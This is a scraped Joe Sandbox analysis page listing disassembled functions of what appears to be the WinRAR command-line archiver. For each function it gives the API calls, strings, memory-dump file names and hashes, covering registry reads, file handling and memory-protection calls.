Instruction ID: 92346c919710dad404edfc54d008ddf50fb0741099c0b55d50e1590e15c169b6
Opcode Fuzzy Hash: 14e62526a5fe094f5313bc459bcb89c49d64b592d177cda5e67d6b33ee2d4267
Instruction Fuzzy Hash: 7F22B222A197C285EB20AF15D8506F9A3E1FF447A4FC04136EA4D876D9EF2CE5A5D330

Function 00007FF7CF894FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF7CF895043
wcschr.LIBVCRUNTIME ref: 00007FF7CF895129

Strings

.rar, xrefs: 00007FF7CF8950E6
AFUMD, xrefs: 00007FF7CF895122
.part, xrefs: 00007FF7CF8950A5
.rar, xrefs: 00007FF7CF89508E
FUADPXETK, xrefs: 00007FF7CF89503C
stdin, xrefs: 00007FF7CF8952C2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: e2bf175498de450bdbd3916c7eea4413e0b0c851167e7f2d0638573c66a5bca8
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: 4DC16161A18AC244EA64BF25C8551FC93D1EF46BA4FC44135EA4E4E6DADE2CF721E330

Function 00007FF7CF8C7F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7CF8C805C

Part of subcall function 00007FF7CF8CB3F0: GetSystemDirectoryW.KERNEL32(00000000,00007FF7CF8C7F72), ref: 00007FF7CF8CB41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF7CF8C7F88
GetProcAddress.KERNEL32 ref: 00007FF7CF8C7FA3

Strings

CryptProtectMemory, xrefs: 00007FF7CF8C7F7E
CryptUnprotectMemory failed, xrefs: 00007FF7CF8C8053
Crypt32.dll, xrefs: 00007FF7CF8C7F66
CryptProtectMemory failed, xrefs: 00007FF7CF8C8009
CryptUnprotectMemory, xrefs: 00007FF7CF8C7F95

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: 6d5bbe94fc7b5f3542f14a67d800e2dd358a72238af64d91bebdc1eec130a46a
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: DC412821A08BC285EE05AF12AC405B9E7A1BB59BF4FCA1131CD6D07798DE7DE461A330

Function 00007FF7CF8DB0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7CF8DB110

Part of subcall function 00007FF7CF8DAA8C: __isa_available_init.LIBCMT ref: 00007FF7CF8DAAA9
Part of subcall function 00007FF7CF8DAA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF7CF8DAAAE

__scrt_fastfail.LIBCMT ref: 00007FF7CF8DB11E

Part of subcall function 00007FF7CF8DB52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7CF8DB548
Part of subcall function 00007FF7CF8DB52C: RtlCaptureContext.KERNEL32 ref: 00007FF7CF8DB571
Part of subcall function 00007FF7CF8DB52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7CF8DB58B
Part of subcall function 00007FF7CF8DB52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF7CF8DB5CC
Part of subcall function 00007FF7CF8DB52C: IsDebuggerPresent.KERNEL32 ref: 00007FF7CF8DB620
Part of subcall function 00007FF7CF8DB52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7CF8DB641
Part of subcall function 00007FF7CF8DB52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF7CF8DB64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7CF8DB12C
__scrt_fastfail.LIBCMT ref: 00007FF7CF8DB143
__scrt_release_startup_lock.LIBCMT ref: 00007FF7CF8DB1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF7CF8DB1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF7CF8DB1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF7CF8DB21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF7CF8DB239

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: d6736e78df24275073fff077a7230fe7a12bd1e749fb1f9fbaa8afed7513386b
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: 4C314C25E082C385EE14BF65A9113F9A3D1AF55BA4FC42036DA0D47297DF6CE424A370

Function 00007FF7CF8C4774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C47DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C48A6

Strings

LanguageFolder, xrefs: 00007FF7CF8C4806
Software\WinRAR\General, xrefs: 00007FF7CF8C47CD

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: a2df0782dacc9858d90314f9185df1910113eb4fc934c19eaaf59b086c2c7cae
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: A131C722718AC585EB50EF21E8142F9A3A0FF847B4F804231EE4D47B99EF6CD154D720

Function 00007FF7CF8B4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B43D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B4402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B443E

Strings

AppData, xrefs: 00007FF7CF8B43F7
Software\WinRAR\Paths, xrefs: 00007FF7CF8B43BC

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: 4081c4fb2f4cd11928493e8b26018387cefa7ced96e0888b94b4fee59f312c50
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: 1D116332A1878289EF10AF25A8015EAB3A0FF94BE4F845131EE4E07699DF3CD064D730

Function 00007FF7CF887A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF7CF887BF3

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: bfe6fc976dbe33fdf4425640d4b10151a71b19a50d871be7ca308560478a8ca7
Instruction ID: 58866079d9fc8e3f8dc9ddb3c33bae105e7367385606f34bb0a378f3b05c0140
Opcode Fuzzy Hash: bfe6fc976dbe33fdf4425640d4b10151a71b19a50d871be7ca308560478a8ca7
Instruction Fuzzy Hash: 23E1BD62A09AD285EB10EF25E488AFD63E9EB4579CF854531CE4D03786DF38E564E330

Function 00007FF7CF8A2574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF7CF8A25B0
WriteFile.KERNEL32 ref: 00007FF7CF8A25F9
WriteFile.KERNELBASE ref: 00007FF7CF8A262E
GetLastError.KERNEL32 ref: 00007FF7CF8A2658
SetLastError.KERNEL32 ref: 00007FF7CF8A2689

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 57acc9d646a6c9050f1b0937ba2608ad9e3b6819976afaf5e29cda44b7d29b64
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: 6F51942660968287EB64EF25E4143BAE3E0FB45B64F840135DA4E46690CF3CE565D730

Function 00007FF7CF8A1E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7CF8A1F4A
GetLastError.KERNEL32 ref: 00007FF7CF8A1F59
CreateFileW.KERNELBASE ref: 00007FF7CF8A1F99
GetLastError.KERNEL32 ref: 00007FF7CF8A1FA2
SetFileTime.KERNEL32 ref: 00007FF7CF8A1FF1

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: c5f78c9b21c7519e8a15c6632fa3748e957444f04285015ec2167eb7b599e976
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: 8E414472A196C14AFB649F24E8057E9AAE0EB45BB8F800334DE7D436C4CF7CC4659B60

Function 00007FF7CF896AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF896C13

Strings

switches_%ls=, xrefs: 00007FF7CF896C03
rar.ini, xrefs: 00007FF7CF896B37
switches=, xrefs: 00007FF7CF896B80

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: 2f346b12162901a7ffb76c92fb5f141b3d1c0f424a2fbd384a1097656dd7f5ab
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: CF416922A1868295EB14BF21D4111E9A3E0FB547B4F810135EA6D03ADAEF3CE665D330

Function 00007FF7CF8B7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7CF8CB470: GetModuleHandleW.KERNEL32 ref: 00007FF7CF8CB488
Part of subcall function 00007FF7CF8CB470: GetProcAddress.KERNEL32 ref: 00007FF7CF8CB4A0
Part of subcall function 00007FF7CF8CB470: GetProcAddress.KERNEL32 ref: 00007FF7CF8CB4D5

Part of subcall function 00007FF7CF897A68: setbuf.LIBCMT ref: 00007FF7CF897A7B
Part of subcall function 00007FF7CF897A68: setbuf.LIBCMT ref: 00007FF7CF897A8F

SetErrorMode.KERNELBASE ref: 00007FF7CF8B7E5D
GetModuleHandleW.KERNEL32 ref: 00007FF7CF8B7E65

Part of subcall function 00007FF7CF8C48CC: GetVersionExW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C496A
Part of subcall function 00007FF7CF8C48CC: LoadLibraryExW.KERNELBASE(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4993

new.LIBCMT ref: 00007FF7CF8B7EA8

Strings

rar.lng, xrefs: 00007FF7CF8B7E7D

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
Instruction ID: 118e69a701acb4ae1448cb70e949eb897e4c9f6e56cedd5f625e1711724d1643
Opcode Fuzzy Hash: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
Instruction Fuzzy Hash: 74415D22A086C349EE14BF21A8111FDE3E19F91B74FD86035E94E476D6CE2DE925A730

Function 00007FF7CF8B40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF7CF8B4432,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B40C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B40DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF7CF8B40F1

Part of subcall function 00007FF7CF8A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7CF8B413F,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A34A0
Part of subcall function 00007FF7CF8A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7CF8B413F,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A34D5

Strings

WinRAR, xrefs: 00007FF7CF8B410F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

